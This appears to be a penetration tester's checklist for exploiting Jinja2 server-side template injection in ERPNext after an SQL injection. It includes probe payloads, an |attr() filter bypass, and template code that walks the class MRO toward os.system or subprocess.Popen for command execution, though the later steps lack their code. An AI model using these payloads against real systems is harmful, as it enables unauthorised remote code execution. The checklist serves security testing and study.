ERPNext (SQLi -> SSTI)
π§ͺ SSTI Exploitation Checklist (Jinja2)
β
1. Confirm SSTI
Inject
{{7*7}}or{{1337}}and check for evaluation.Try
{% set var = "test" %}to test logic blocks.
π 2. Bypass Filters
Use
|attr()to access attributes dynamically.Example:
{{ "ssti"|attr("__class__") }}
𧬠3. Access MRO (Method Resolution Order)
{% set string = "ssti" %}
{% set class = "__class__" %}
{% set mro = "__mro__" %}
{% set mro_r = string|attr(class)|attr(mro) %}
{{ mro_r[1] }}𧬠4. List Subclasses
π 5. Identify Useful Classes
Look for
subprocess.Popen,os.system, etc.Use indexing to access specific class:
π£ 6. Execute Commands
π§Ό 7. Clean Output
Use VS Code or a script to format subclass output.
Replace
", "with newlines for easier indexing.
Last updated